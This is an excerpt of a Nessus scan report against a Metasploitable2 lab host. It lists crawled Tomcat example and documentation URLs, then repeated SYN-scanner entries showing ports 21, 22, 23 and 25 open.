- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/EchoAttributesTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/coda.jspf.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/config.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/config.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/config.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/dynamicattrs.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/dynamicattrs.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/dynamicattrs.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/prelude.jspf.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/BookBean.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/FindBookSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/Functions.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/HelloWorldSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/RepeatSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/book.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/book.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/book.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/hello.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/hello.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/hello.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/repeat.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/repeat.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/repeat.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/displayProducts.tag.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/hello.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/hello.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/hello.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/helloWorld.tag.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/panel.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/panel.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/panel.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/panel.tag.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/products.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/products.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/products.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsptoserv/jsptoservlet.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsptoserv/jsptoservlet.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsptoserv/jts.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsptoserv/servletToJsp.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/num/numguess.html
- http://metasploitable2.sicurform:8180/jsp-examples/num/numguess.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/num/numguess.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/plugin/plugin.html
- http://metasploitable2.sicurform:8180/jsp-examples/plugin/plugin.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/plugin/plugin.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/DummyCart.html
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/carts.html
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/carts.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/carts.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/crt.html
- http://metasploitable2.sicurform:8180/jsp-examples/simpletag/foo.html
- http://metasploitable2.sicurform:8180/jsp-examples/simpletag/foo.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/simpletag/foo.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/snp/snoop.html
- http://metasploitable2.sicurform:8180/jsp-examples/snp/snoop.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/snp/snoop.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/choose.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/choose.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/choose.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/foreach.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/foreach.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/foreach.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/howto.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/if.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/if.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/if.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/notes.html
- http://metasploitable2.sicurform:8180/jsp-examples/xml/xml.html
- http://metasploitable2.sicurform:8180/jsp-examples/xml/xml.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/xml/xml.jsp.html
- http://metasploitable2.sicurform:8180/servlets-examples/
- http://metasploitable2.sicurform:8180/servlets-examples/cookies.html
- http://metasploitable2.sicurform:8180/servlets-examples/helloworld.html
- http://metasploitable2.sicurform:8180/servlets-examples/index.html
- http://metasploitable2.sicurform:8180/servlets-examples/reqheaders.html
- http://metasploitable2.sicurform:8180/servlets-examples/reqinfo.html
- http://metasploitable2.sicurform:8180/servlets-examples/reqparams.html
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/CookieExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/HelloWorldExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/RequestHeaderExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/RequestInfoExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/RequestParamExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/SessionExample
- http://metasploitable2.sicurform:8180/servlets-examples/sessions.html
- http://metasploitable2.sicurform:8180/tomcat-docs/
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/deployment.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/installation.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/introduction.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/deployment.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/installation.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/introduction.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/processes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/source.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/processes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/sample/
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/source.html
- http://metasploitable2.sicurform:8180/tomcat-docs/apr.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/overview.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/printer/
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/printer/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/printer/overview.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/printer/requestProcess.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/printer/startup.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/requestProcess.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/startup.html
- http://metasploitable2.sicurform:8180/tomcat-docs/balancer-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/building.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/docs/api/
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/docs/api/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-admin-apps.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-admin-objects.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-admin-opers.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-default.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-jdbc-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-jndi-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-memory-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/mbean-names.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-admin-apps.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-admin-objects.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-admin-opers.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-default.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-jdbc-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-jndi-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-memory-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/mbean-names.html
- http://metasploitable2.sicurform:8180/tomcat-docs/cgi-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/class-loader-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/cluster-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/
- http://metasploitable2.sicurform:8180/tomcat-docs/config/ajp.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/context.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/engine.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/globalresources.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/http.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/loader.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/manager.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/ajp.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/context.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/engine.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/globalresources.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/http.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/loader.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/manager.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/resources.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/server.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/service.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/valve.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/resources.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/server.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/service.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/valve.html
- http://metasploitable2.sicurform:8180/tomcat-docs/connectors.html
- http://metasploitable2.sicurform:8180/tomcat-docs/default-servlet.html
- http://metasploitable2.sicurform:8180/tomcat-docs/deployer-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/developers.html
- http://metasploitable2.sicurform:8180/tomcat-docs/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/introduction.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jasper-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jasper/docs/api/
- http://metasploitable2.sicurform:8180/tomcat-docs/jasper/docs/api/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jndi-datasource-examples-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jndi-resources-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/about.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/all-classes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/all-packages.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/deprecated.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/HttpJspPage-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/HttpJspPage.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspContext-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspContext.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspEngineInfo-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspEngineInfo.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspException-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspException.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspPage-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspPage.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspWriter-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspWriter.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/SkipPageException-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/SkipPageException.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/classes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/tree.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/overview-summary.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/tree.html
- http://metasploitable2.sicurform:8180/tomcat-docs/logging.html
- http://metasploitable2.sicurform:8180/tomcat-docs/manager-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/mbeans-descriptor-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/monitoring.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/apr.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/balancer-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/building.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/cgi-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/class-loader-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/cluster-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/connectors.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/default-servlet.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/deployer-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/developers.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/introduction.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/jasper-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/jndi-datasource-examples-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/jndi-resources-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/logging.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/manager-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/mbeans-descriptor-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/monitoring.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/proxy-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/realm-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/security-manager-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/setup.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/ssi-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/ssl-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/status.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/virtual-hosting-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/windows-service-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/proxy-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/realm-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/security-manager-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/about.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/all-classes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/all-packages.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/alphaindex.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/deprecated.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/Filter-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/Filter.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/FilterChain-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/FilterChain.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/FilterConfig-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/FilterConfig.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/GenericServlet-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/GenericServlet.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/RequestDispatcher-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/RequestDispatcher.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/Servlet-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/Servlet.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletConfig-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletConfig.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContext-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContext.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextAttributeEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextAttributeEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextAttributeListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextAttributeListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletException-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletException.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletInputStream-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletInputStream.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletOutputStream-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletOutputStream.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequest-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequest.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestAttributeEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestAttributeEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestAttributeListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestAttributeListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestWrapper-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestWrapper.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletResponse-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletResponse.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletResponseWrapper-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletResponseWrapper.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/SingleThreadModel-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/SingleThreadModel.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/UnavailableException-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/UnavailableException.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/classes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/Cookie-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/Cookie.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletRequest-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletRequest.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletRequestWrapper-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletRequestWrapper.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletResponseWrapper-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletResponseWrapper.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSession-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSession.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionActivationListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionActivationListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionAttributeListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionAttributeListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionBindingEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionBindingEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionBindingListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionBindingListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionContext-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionContext.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpUtils-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpUtils.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/classes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/package-summary.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/tree.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/package-summary.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/tree.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/overview-summary.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/serialized-form.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/tree.html
- http://metasploitable2.sicurform:8180/tomcat-docs/setup.html
- http://metasploitable2.sicurform:8180/tomcat-docs/ssi-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/ssl-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/status.html
- http://metasploitable2.sicurform:8180/tomcat-docs/virtual-hosting-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/windows-service-howto.html
- http://metasploitable2.sicurform:8180/webdav
- http://metasploitable2.sicurform:8180/webdav/
- http://metasploitable2.sicurform:8180/webdav/index.html

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/21/ftp

Port 21/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/22/ssh

Port 22/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/23/telnet

Port 23/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/25/smtp

Port 25/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
